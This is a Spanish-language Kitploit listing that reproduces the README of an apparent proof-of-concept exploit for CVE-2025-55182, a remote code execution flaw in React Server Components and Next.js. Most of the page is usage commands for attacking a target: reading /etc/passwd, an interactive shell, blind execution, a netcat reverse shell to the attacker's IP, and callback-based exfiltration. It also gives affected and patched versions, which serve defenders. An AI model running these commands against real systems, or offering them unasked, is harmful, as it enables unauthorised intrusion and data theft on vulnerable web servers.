Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
react2shell-poc — CVE-2025-55182 React2Shell PoC - RCE crítica en React Server Components / Next.js. CVSS 10.0. Exfiltración basada en errores, shell inversa, modo interactivo. | Kitploit
Herramientas/GitHubGitHub/p3ta00/react2shell-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubp3ta00/react2shell-poc

react2shell-poc

CVE-2025-55182 React2Shell PoC - RCE crítica en React Server Components / Next.js. CVSS 10.0. Exfiltración basada en errores, shell inversa, modo interactivo.

912hace 3 mesesAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

React2Shell - CVE-2025-55182 PoC

Prueba de concepto para CVE-2025-55182, una vulnerabilidad crítica de ejecución remota de código no autenticada en React Server Components.

Puntuación CVSS: 10.0 (Crítica)

Vulnerabilidad

La vulnerabilidad se encuentra en el deserializador del protocolo Flight de React. Al explotar la contaminación de prototipos mediante payloads especialmente diseñados, un atacante puede lograr la ejecución arbitraria de código en aplicaciones Next.js vulnerables.

Versiones afectadas

ProductoVulnerableParcheado
React19.0.0 - 19.2.019.0.1, 19.1.2, 19.2.1+
Next.js14.3.0-canary.77 - 16.x15.0.5, 15.1.9, 15.2.6, 16.0.7+

Instalación

root@kitploit:~
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests

Uso

Ejecución de comandos con salida (Predeterminado - Exfiltración basada en errores)

La salida se devuelve directamente en la respuesta HTTP a través del error NEXT_REDIRECT - no se necesita servidor de callback.

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"

Modo interactivo

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -i

Verificar vulnerabilidad

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 --check

RCE Ciego (Sin salida)

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind

Shell inversa

root@kitploit:~
# Iniciar listener
nc -lvnp 4444

# Enviar payload
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444

Heredado: Exfiltración basada en callback

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP

Opciones

root@kitploit:~
-t, --target       URL de destino (requerido)
-c, --command      Comando a ejecutar (salida mediante exfiltración basada en errores por defecto)
--check            Verificar si el objetivo es vulnerable
--blind            Modo RCE ciego (sin captura de salida)
--listen           Usar servidor de callback en lugar de exfiltración basada en errores
-i, --interactive  Modo pseudo-shell interactivo
--revshell         Intentar shell inversa
--lhost            IP del atacante para callbacks/shell inversa
--lport            Puerto de callback (predeterminado: 9999)
--callback         URL de callback manual
--timeout          Tiempo de espera de solicitud en segundos (predeterminado: 30)

Cómo funciona

El método de exfiltración predeterminado utiliza inyección de error NEXT_REDIRECT:

  1. Ejecutar comando y capturar salida
  2. Lanzar un error NEXT_REDIRECT con la salida en el campo digest
  3. Next.js serializa el error en la respuesta Flight
  4. La salida aparece directamente en el cuerpo de la respuesta HTTP

Esto es más fiable que la exfiltración basada en callback porque no requiere acceso de red saliente desde el objetivo.

Referencias

  • Wiz Security - Divulgación de React2Shell
  • Análisis de Datadog Security Labs
  • NVD - CVE-2025-55182

Descargo de responsabilidad

Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Siempre obtenga la autorización adecuada antes de realizar pruebas.

Autor

p3ta

Descargar herramienta